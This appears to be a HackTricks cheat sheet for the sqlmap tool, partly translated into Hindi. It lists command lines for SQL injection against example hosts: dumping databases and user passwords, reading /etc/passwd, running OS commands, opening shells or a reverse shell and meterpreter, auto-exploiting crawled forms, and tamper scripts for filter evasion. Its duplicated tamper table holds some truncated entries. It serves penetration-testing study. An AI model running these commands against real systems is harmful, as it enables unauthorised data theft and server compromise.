SQLMap - Cheetsheat

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

कमजोरी मूल्यांकन और पेनिट्रेशन टेस्टिंग के लिए तुरंत उपलब्ध सेटअप। कहीं से भी 20+ उपकरणों और सुविधाओं के साथ एक पूर्ण पेंटेस्ट चलाएँ जो पुनः खोज से रिपोर्टिंग तक जाते हैं। हम पेंटेस्टर्स को प्रतिस्थापित नहीं करते - हम उन्हें गहराई से खुदाई करने, शेल पॉप करने और मज़े करने के लिए कुछ समय वापस देने के लिए कस्टम उपकरण, पहचान और शोषण मॉड्यूल विकसित करते हैं।

Penetration testing toolkit, ready to usePentest-Tools.com

SQLmap के लिए बुनियादी तर्क

सामान्य

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char

जानकारी प्राप्त करें

आंतरिक

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges

DB डेटा

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Injection place

From Burp/ZAP capture

अनुरोध को कैप्चर करें और एक req.txt फ़ाइल बनाएं

sqlmap -r req.txt --current-user

GET अनुरोध इंजेक्शन

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POST अनुरोध इंजेक्शन

sqlmap -u "http://example.com" --data "username=*&password=*"

हेडर और अन्य HTTP विधियों में इंजेक्शन

#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

सफल इंजेक्शन होने पर स्ट्रिंग इंगित करें

--string="string_showed_when_TRUE"

Eval

Sqlmap -e या --eval का उपयोग करने की अनुमति देता है ताकि प्रत्येक payload को कुछ python oneliner के साथ भेजने से पहले संसाधित किया जा सके। यह payload को भेजने से पहले कस्टम तरीकों से संसाधित करना बहुत आसान और तेज़ बनाता है। निम्नलिखित उदाहरण में flask cookie session को भेजने से पहले ज्ञात गुप्त के साथ flask द्वारा हस्ताक्षरित किया गया है:

sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump

शेल

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

फ़ाइल पढ़ें

--file-read=/etc/passwd

SQLmap के साथ एक वेबसाइट को क्रॉल करें और ऑटो-एक्सप्लॉइट करें

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

सेकंड ऑर्डर इंजेक्शन

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

इस पोस्ट को पढ़ें यहां बताया गया है कि sqlmap के साथ सरल और जटिल दूसरे क्रम के इंजेक्शन कैसे करें।

इंजेक्शन को अनुकूलित करना

एक उपसर्ग सेट करें

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

उपसर्ग

python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

बूलियन इंजेक्शन खोजने में मदद

# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

याद रखें कि आप अपने खुद के tamper को python में बना सकते हैं और यह बहुत सरल है। आप Second Order Injection पृष्ठ पर एक tamper उदाहरण यहाँ पा सकते हैं।

--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper

Tamper	Description
apostrophemask.py	अपॉस्ट्रॉफ चर को इसके UTF-8 पूर्ण चौड़ाई समकक्ष के साथ बदलता है
apostrophenullencode.py	अपॉस्ट्रॉफ चर को इसके अवैध डबल यूनिकोड समकक्ष के साथ बदलता है
appendnullbyte.py	पेलोड के अंत में एन्कोडेड NULL बाइट चर जोड़ता है
base64encode.py	दिए गए पेलोड में सभी चर को Base64 में परिवर्तित करता है
between.py	'>' ऑपरेटर को 'NOT BETWEEN 0 AND #' के साथ बदलता है
bluecoat.py	SQL कथन के बाद स्पेस चर को एक मान्य यादृच्छिक खाली चर के साथ बदलता है। इसके बाद चर = को LIKE ऑपरेटर के साथ बदलता है
chardoubleencode.py	दिए गए पेलोड में सभी चर को डबल URL-एन्कोड करता है (पहले से एन्कोडेड को प्रोसेस नहीं करता)
commalesslimit.py	'LIMIT M, N' जैसे उदाहरणों को 'LIMIT N OFFSET M' के साथ बदलता है
commalessmid.py	'MID(A, B, C)' जैसे उदाहरणों को 'MID(A FROM B FOR C)' के साथ बदलता है
concat2concatws.py	'CONCAT(A, B)' जैसे उदाहरणों को 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' के साथ बदलता है
charencode.py	दिए गए पेलोड में सभी चर को URL-एन्कोड करता है (पहले से एन्कोडेड को प्रोसेस नहीं करता)
charunicodeencode.py	दिए गए पेलोड में गैर-एन्कोडेड चर को यूनिकोड-यूआरएल-एन्कोड करता है (पहले से एन्कोडेड को प्रोसेस नहीं करता)। "%u0022"
charunicodeescape.py	दिए गए पेलोड में गैर-एन्कोडेड चर को यूनिकोड-यूआरएल-एन्कोड करता है (पहले से एन्कोडेड को प्रोसेस नहीं करता)। "\u0022"
equaltolike.py	'=' ऑपरेटर के सभी उदाहरणों को 'LIKE' ऑपरेटर के साथ बदलता है
escapequotes.py	उद्धरण चिह्नों (' और ") को स्लैश से एस्केप करता है
greatest.py	'>' ऑपरेटर को 'GREATEST' समकक्ष के साथ बदलता है
halfversionedmorekeywords.py	प्रत्येक कीवर्ड से पहले संस्करणित MySQL टिप्पणी जोड़ता है
ifnull2ifisnull.py	'IFNULL(A, B)' जैसे उदाहरणों को 'IF(ISNULL(A), B, A)' के साथ बदलता है
modsecurityversioned.py	पूर्ण क्वेरी को संस्करणित टिप्पणी के साथ घेरता है
modsecurityzeroversioned.py	पूर्ण क्वेरी को शून्य-संस्करणित टिप्पणी के साथ घेरता है
multiplespaces.py	SQL कीवर्ड के चारों ओर कई स्पेस जोड़ता है
nonrecursivereplacement.py	पूर्वनिर्धारित SQL कीवर्ड को प्रतिस्थापन के लिए उपयुक्त प्रतिनिधित्व के साथ बदलता है (जैसे .replace("SELECT", "")) फ़िल्टर
percentage.py	प्रत्येक चर के सामने एक प्रतिशत चिह्न ('%') जोड़ता है
overlongutf8.py	दिए गए पेलोड में सभी चर को परिवर्तित करता है (पहले से एन्कोडेड को प्रोसेस नहीं करता)
randomcase.py	प्रत्येक कीवर्ड चर को यादृच्छिक केस मान के साथ बदलता है
randomcomments.py	SQL कीवर्ड में यादृच्छिक टिप्पणियाँ जोड़ता है
securesphere.py	विशेष रूप से तैयार किया गया स्ट्रिंग जोड़ता है
sp_password.py	पेलोड के अंत में 'sp_password' जोड़ता है ताकि DBMS लॉग से स्वचालित रूप से छिपाया जा सके
space2comment.py	स्पेस चर (' ') को टिप्पणियों के साथ बदलता है
space2dash.py	स्पेस चर (' ') को एक डैश टिप्पणी ('--') के साथ बदलता है, इसके बाद एक यादृच्छिक स्ट्रिंग और एक नई पंक्ति ('\n') होती है
space2hash.py	स्पेस चर (' ') को एक पाउंड चर ('#') के साथ बदलता है, इसके बाद एक यादृच्छिक स्ट्रिंग और एक नई पंक्ति ('\n') होती है
space2morehash.py	स्पेस चर (' ') को एक पाउंड चर ('#') के साथ बदलता है, इसके बाद एक यादृच्छिक स्ट्रिंग और एक नई पंक्ति ('\n') होती है
space2mssqlblank.py	स्पेस चर (' ') को वैध वैकल्पिक चर के सेट से एक यादृच्छिक खाली चर के साथ बदलता है
space2mssqlhash.py	स्पेस चर (' ') को एक पाउंड चर ('#') के साथ बदलता है, इसके बाद एक नई पंक्ति ('\n') होती है
space2mysqlblank.py	स्पेस चर (' ') को वैध वैकल्पिक चर के सेट से एक यादृच्छिक खाली चर के साथ बदलता है
space2mysqldash.py	स्पेस चर (' ') को एक डैश टिप्पणी ('--') के साथ बदलता है, इसके बाद एक नई पंक्ति ('\n') होती है
space2plus.py	स्पेस चर (' ') को प्लस ('+') के साथ बदलता है
space2randomblank.py	स्पेस चर (' ') को वैध वैकल्पिक चर के सेट से एक यादृच्छिक खाली चर के साथ बदलता है
symboliclogical.py	AND और OR तार्किक ऑपरेटर को उनके प्रतीकात्मक समकक्ष (&& और
unionalltounion.py	UNION ALL SELECT को UNION SELECT के साथ बदलता है
unmagicquotes.py	उद्धरण चर (') को एक मल्टी-बाइट कॉम्बो %bf%27 के साथ बदलता है, साथ में अंत में एक सामान्य टिप्पणी (काम करने के लिए)
uppercase.py	प्रत्येक कीवर्ड चर को बड़े अक्षर के मान 'INSERT' के साथ बदलता है
varnish.py	एक HTTP हेडर 'X-originating-IP' जोड़ता है
versionedkeywords.py	प्रत्येक गैर-फंक्शन कीवर्ड को संस्करणित MySQL टिप्पणी के साथ घेरता है
versionedmorekeywords.py	प्रत्येक कीवर्ड को संस्करणित MySQL टिप्पणी के साथ घेरता है
xforwardedfor.py	एक नकली HTTP हेडर 'X-Forwarded-For' जोड़ता है

Tamper

Description

apostrophemask.py

अपॉस्ट्रॉफ चर को इसके UTF-8 पूर्ण चौड़ाई समकक्ष के साथ बदलता है

apostrophenullencode.py

अपॉस्ट्रॉफ चर को इसके अवैध डबल यूनिकोड समकक्ष के साथ बदलता है

appendnullbyte.py

पेलोड के अंत में एन्कोडेड NULL बाइट चर जोड़ता है

base64encode.py

दिए गए पेलोड में सभी चर को Base64 में परिवर्तित करता है

between.py

'>' ऑपरेटर को 'NOT BETWEEN 0 AND #' के साथ बदलता है

bluecoat.py

SQL कथन के बाद स्पेस चर को एक मान्य यादृच्छिक खाली चर के साथ बदलता है। इसके बाद चर = को LIKE ऑपरेटर के साथ बदलता है

chardoubleencode.py

दिए गए पेलोड में सभी चर को डबल URL-एन्कोड करता है (पहले से एन्कोडेड को प्रोसेस नहीं करता)

commalesslimit.py

'LIMIT M, N' जैसे उदाहरणों को 'LIMIT N OFFSET M' के साथ बदलता है

commalessmid.py

'MID(A, B, C)' जैसे उदाहरणों को 'MID(A FROM B FOR C)' के साथ बदलता है

concat2concatws.py

'CONCAT(A, B)' जैसे उदाहरणों को 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' के साथ बदलता है

charencode.py

दिए गए पेलोड में सभी चर को URL-एन्कोड करता है (पहले से एन्कोडेड को प्रोसेस नहीं करता)

charunicodeencode.py

दिए गए पेलोड में गैर-एन्कोडेड चर को यूनिकोड-यूआरएल-एन्कोड करता है (पहले से एन्कोडेड को प्रोसेस नहीं करता)। "%u0022"

charunicodeescape.py

दिए गए पेलोड में गैर-एन्कोडेड चर को यूनिकोड-यूआरएल-एन्कोड करता है (पहले से एन्कोडेड को प्रोसेस नहीं करता)। "\u0022"

equaltolike.py

'=' ऑपरेटर के सभी उदाहरणों को 'LIKE' ऑपरेटर के साथ बदलता है

escapequotes.py

उद्धरण चिह्नों (' और ") को स्लैश से एस्केप करता है

greatest.py

'>' ऑपरेटर को 'GREATEST' समकक्ष के साथ बदलता है

halfversionedmorekeywords.py

प्रत्येक कीवर्ड से पहले संस्करणित MySQL टिप्पणी जोड़ता है

ifnull2ifisnull.py

'IFNULL(A, B)' जैसे उदाहरणों को 'IF(ISNULL(A), B, A)' के साथ बदलता है

modsecurityversioned.py

पूर्ण क्वेरी को संस्करणित टिप्पणी के साथ घेरता है

modsecurityzeroversioned.py

पूर्ण क्वेरी को शून्य-संस्करणित टिप्पणी के साथ घेरता है

multiplespaces.py

SQL कीवर्ड के चारों ओर कई स्पेस जोड़ता है

nonrecursivereplacement.py

पूर्वनिर्धारित SQL कीवर्ड को प्रतिस्थापन के लिए उपयुक्त प्रतिनिधित्व के साथ बदलता है (जैसे .replace("SELECT", "")) फ़िल्टर

percentage.py

प्रत्येक चर के सामने एक प्रतिशत चिह्न ('%') जोड़ता है

overlongutf8.py

दिए गए पेलोड में सभी चर को परिवर्तित करता है (पहले से एन्कोडेड को प्रोसेस नहीं करता)

randomcase.py

प्रत्येक कीवर्ड चर को यादृच्छिक केस मान के साथ बदलता है

randomcomments.py

SQL कीवर्ड में यादृच्छिक टिप्पणियाँ जोड़ता है

securesphere.py

विशेष रूप से तैयार किया गया स्ट्रिंग जोड़ता है

sp_password.py

पेलोड के अंत में 'sp_password' जोड़ता है ताकि DBMS लॉग से स्वचालित रूप से छिपाया जा सके

space2comment.py

स्पेस चर (' ') को टिप्पणियों के साथ बदलता है

space2dash.py

स्पेस चर (' ') को एक डैश टिप्पणी ('--') के साथ बदलता है, इसके बाद एक यादृच्छिक स्ट्रिंग और एक नई पंक्ति ('\n') होती है

space2hash.py

स्पेस चर (' ') को एक पाउंड चर ('#') के साथ बदलता है, इसके बाद एक यादृच्छिक स्ट्रिंग और एक नई पंक्ति ('\n') होती है

space2morehash.py

space2mssqlblank.py

स्पेस चर (' ') को वैध वैकल्पिक चर के सेट से एक यादृच्छिक खाली चर के साथ बदलता है

space2mssqlhash.py

स्पेस चर (' ') को एक पाउंड चर ('#') के साथ बदलता है, इसके बाद एक नई पंक्ति ('\n') होती है

space2mysqlblank.py

स्पेस चर (' ') को वैध वैकल्पिक चर के सेट से एक यादृच्छिक खाली चर के साथ बदलता है

space2mysqldash.py

स्पेस चर (' ') को एक डैश टिप्पणी ('--') के साथ बदलता है, इसके बाद एक नई पंक्ति ('\n') होती है

space2plus.py

स्पेस चर (' ') को प्लस ('+') के साथ बदलता है

space2randomblank.py

स्पेस चर (' ') को वैध वैकल्पिक चर के सेट से एक यादृच्छिक खाली चर के साथ बदलता है

symboliclogical.py

AND और OR तार्किक ऑपरेटर को उनके प्रतीकात्मक समकक्ष (&& और

unionalltounion.py

UNION ALL SELECT को UNION SELECT के साथ बदलता है

unmagicquotes.py

उद्धरण चर (') को एक मल्टी-बाइट कॉम्बो %bf%27 के साथ बदलता है, साथ में अंत में एक सामान्य टिप्पणी (काम करने के लिए)

uppercase.py

प्रत्येक कीवर्ड चर को बड़े अक्षर के मान 'INSERT' के साथ बदलता है

varnish.py

एक HTTP हेडर 'X-originating-IP' जोड़ता है

versionedkeywords.py

प्रत्येक गैर-फंक्शन कीवर्ड को संस्करणित MySQL टिप्पणी के साथ घेरता है

versionedmorekeywords.py

प्रत्येक कीवर्ड को संस्करणित MySQL टिप्पणी के साथ घेरता है

xforwardedfor.py

एक नकली HTTP हेडर 'X-Forwarded-For' जोड़ता है

कमजोरी मूल्यांकन और पेनिट्रेशन टेस्टिंग के लिए तुरंत उपलब्ध सेटअप। 20+ उपकरणों और सुविधाओं के साथ कहीं से भी एक पूर्ण पेंटेस्ट चलाएँ जो पुनः खोज से रिपोर्टिंग तक जाते हैं। हम पेंटेस्टर्स को प्रतिस्थापित नहीं करते - हम उन्हें गहराई से खुदाई करने, शेल पॉप करने और मज़े करने के लिए कुछ समय वापस देने के लिए कस्टम उपकरण, पहचान और शोषण मॉड्यूल विकसित करते हैं।

Penetration testing toolkit, ready to usePentest-Tools.com

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

सदस्यता योजनाएँ देखें!
💬 Discord समूह या टेलीग्राम समूह में शामिल हों या Twitter पर हमें फॉलो करें 🐦 @hacktricks_live.**
हैकिंग ट्रिक्स साझा करें, HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PR सबमिट करके।

PreviousRCE with PostgreSQL Extensions NextSecond Order Injection - SQLMap

Last updated 1 month ago